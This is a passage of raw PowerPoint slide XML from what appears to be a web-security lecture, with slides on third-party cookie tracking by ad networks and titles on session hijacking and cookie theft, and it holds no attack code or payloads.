              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>cookies?</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F436B8A5-87AC-3E47-AFBB-6B0178A1429A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2270125"/>
            <a:ext cx="111125" cy="317500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>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31589B1A-D9A9-2640-B7A5-F0BC4CB0D89C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079500" y="2228850"/>
            <a:ext cx="3340100" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ECFD295-BEE6-7A40-B19D-79A271CAA5AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="2809875"/>
            <a:ext cx="149225" cy="317500"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10CA84E8-6A28-9044-896A-5F35B012E51E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="3889375"/>
            <a:ext cx="149225" cy="317500"/>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6E8510A8-A366-9145-8B08-6957D1BBE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4429125"/>
            <a:ext cx="149225" cy="317500"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59400" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56994BB-8792-CA42-B72D-9F4807F343A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1422400" y="2630488"/>
            <a:ext cx="7854950"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7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advertisers want to know your behavior  Ideally build a profile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" i="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>across different websites</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2500">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="137000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Visit the Apple Store, then see iPad ads on Amazon?!  How can site B know what you did on site A?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59401" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14964F28-DDD4-6044-B31E-C89E3DDB0A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="211138" y="5762625"/>
            <a:ext cx="5111750" cy="1277938"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 5111750"/>
              <a:gd name="T1" fmla="*/ 0 h 1276984"/>
              <a:gd name="T2" fmla="*/ 5111255 w 5111750"/>
              <a:gd name="T3" fmla="*/ 0 h 1276984"/>
              <a:gd name="T4" fmla="*/ 5111255 w 5111750"/>
              <a:gd name="T5" fmla="*/ 1299067 h 1276984"/>
              <a:gd name="T6" fmla="*/ 0 w 5111750"/>
              <a:gd name="T7" fmla="*/ 1299067 h 1276984"/>
              <a:gd name="T8" fmla="*/ 0 w 5111750"/>
              <a:gd name="T9" fmla="*/ 0 h 12769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11750" h="1276984">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5111255" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5111255" y="1276944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1276944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="982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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{380B3FFD-ED82-404B-978F-AC4869A5CD58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246063" y="5845175"/>
            <a:ext cx="125412" cy="1128713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="300" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="830"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="300" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="830"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="300" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59403" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8CEFE14-A07A-914E-8A7E-11BB9B535A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="571500" y="5781675"/>
            <a:ext cx="4708525"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3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Site A loads an ad from Site C  Site C maintains cookie DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Site B also loads ad from Site C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79781CE7-2551-6F40-8C63-0F6CA2420EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5572125" y="5845175"/>
            <a:ext cx="109538" cy="717550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="830"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59405" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B557B5-9E4B-B74F-9766-E94729E25830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5892800" y="5781675"/>
            <a:ext cx="41275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3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“Third-party cookie”  Commonly used by large  ad networks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1B5D74C-F391-4644-B18C-E5A4A10E211C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2413000" y="7366000"/>
            <a:ext cx="5245100" cy="369888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>How Advertisers Use Internet Cookies to Track You</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:https://vimeo.com/12204858</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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01CE-8CAB-7F83-033A-D0C9CA26FCEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third party cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26511AA6-CAD9-9867-A3AC-E6535AFF8540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069975" y="2597152"/>
            <a:ext cx="7918450" cy="2409890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watch this video:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=QWw7Wd2gUJk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How cookies can track you (Simply Explained)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199020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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EAC97B-5127-D847-ADE4-0EAB84EF54A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1244600" y="279400"/>
            <a:ext cx="7569200" cy="5461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3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC6E08F1-DD72-5641-A9C7-270F1F980A7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892300" y="6140450"/>
            <a:ext cx="6270625" cy="957263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hijacking</a:t>
            </a:r>
            <a:endParaRPr sz="6100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66CCBAC2-9736-9947-815B-9F02B64733EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965700" y="7372350"/>
            <a:ext cx="4946650" cy="158750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" u="sng" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://happyorhungr</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" u="sng" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" u="sng" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.files.wo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" u="sng" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" u="sng" spc="60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>dp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" u="sng" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ress.com/2011/10/cookie_monster_original.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="10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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C8F1826-41C7-C245-999A-EF8B23CA56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1057275"/>
            <a:ext cx="1004887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528F07E-C862-E94E-9470-6765AA1530B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1143000" y="838200"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="472246" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="10" dirty="0"/>
              <a:t>theft</a:t>
            </a:r>
            <a:endParaRPr sz="6100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DA0E478-7935-0240-861D-71149B6280D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="293052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610EE436-82CE-884E-9156-82143B3CA0F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="2876550"/>
            <a:ext cx="5207000" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>capabilities</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
